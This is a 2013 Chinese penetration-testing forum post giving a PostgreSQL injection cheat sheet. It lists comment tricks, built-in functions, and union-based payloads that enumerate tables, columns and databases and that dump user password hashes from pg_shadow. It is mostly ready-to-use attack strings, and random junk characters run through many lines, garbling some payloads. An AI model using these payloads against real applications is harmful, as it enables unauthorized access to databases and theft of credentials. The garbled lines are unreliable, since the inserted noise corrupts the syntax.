中国网络渗透测试联盟

标题: postgreSQL注入总结 [打印本页]

作者: admin 时间: 2013-10-13 12:57
标题: postgreSQL注入总结
结合了MSSQL MySQL Oracle的一些特点

支持多语句执行，语句可以没有from

postgres用户是超级用户(创始人账户) 只有superuser有copy权限

注释: — , /**/6 D: p* K( n! m1 s" [ c$ I$ z
连接符: %20 , + , /**/

内置函数:
) q1 b, E! e. ~; _- R2 s. H( Ocurrent_database() //当前数据库名
1 s# Q v+ F: x* ~2 Z# _session_user //会话用户
, d/ l% ^8 {3 X- q4 jcurrent_user //当前数据库用户
5 ]# t5 E# D0 p) k, o& ^user //当前用户4 a& Y0 C2 H2 c, v. {8 P
version() //数据库版本

Union注射:3 N9 J- q! h/ Y' ~) j; u
order by n–
c, C; f; D& U9 g7 D- t% n9 ^- `and 1=2 union select null,null,null–
% [) Y7 e1 k* z" \1 band 1=2 union select ‘beach’,null,null–& O( w$ X9 E% ?' K5 r. r
and 1=2 union select (select version()),null,null–

获取表名,字段名(新版本利用information_schema):
7 ~! z4 B* f/ p; Bgroup_concat(table_name)
5 y4 W0 M0 P" j8 p; V( Tand 1=2 union select table_name,null,null from information_schema.tables limit 1 offset n–
5 u8 o, t( W. D% K( J1 H0 a- Fand 1=2 union select column_name,null,null from information_schema.columns where table_name=’admin’ limit 1 offset n–
1 i! ?& J/ A) r) i" Z6 a(老版本)
# J! a" s- |- c4 v1 p8 e8 \+ Tpg_class.oid对应pg_attribute.attrelid
4 ~( c A; D6 @; `/ z; | Ypg_class.relname表名
5 t7 `) j; y+ Q3 n0 Epg_attribute.attname字段名

select relname from pg_class获取表名
6 \, e( O9 B$ P+ W9 d3 fselect oid from pg_class where 条件获取参数
0 M7 f( A4 h0 gselect attname from pg_attribute where attrelid=’oid的值’ 获取字段名

实战:+ O6 ~: p7 T# ], K1 p' I' J
and 1=2 union select relname,null,null from pg_class where relkind=’r’ limit 1 offset 0–加入relkind=’r'只查询普通表
7 N; a! C# m5 j) ?" cand 1=2 union select cast(oid as varchar(10)),null,null from pg_class where relkind=’r’ limit 1 offset 0–! v0 ?3 \6 L+ y5 G
由于oid类型是oid,要数据类型兼容我们用cast函数强制转换成varchar类型。比如得到1136

and 1=2 union select attname,null,null from pg_attribute where attrelid=1136 limit 1 offset 0–爆表名: ^7 }1 v/ s0 M
======================================================================1 x# ~9 @$ Z8 c* ~3 T( X
and 1=2 union select datname,null,null from pg_database limit 1 offset 0–爆库
' t8 w9 z. r4 C& ^3 d; ~4 g% @! _# \and 1=2 union select username||chr(124)||passwd,null,null from pg_shadow limit 1 offset 0–爆数据库用户密码

欢迎光临中国网络渗透测试联盟 (https://cobjon.com/)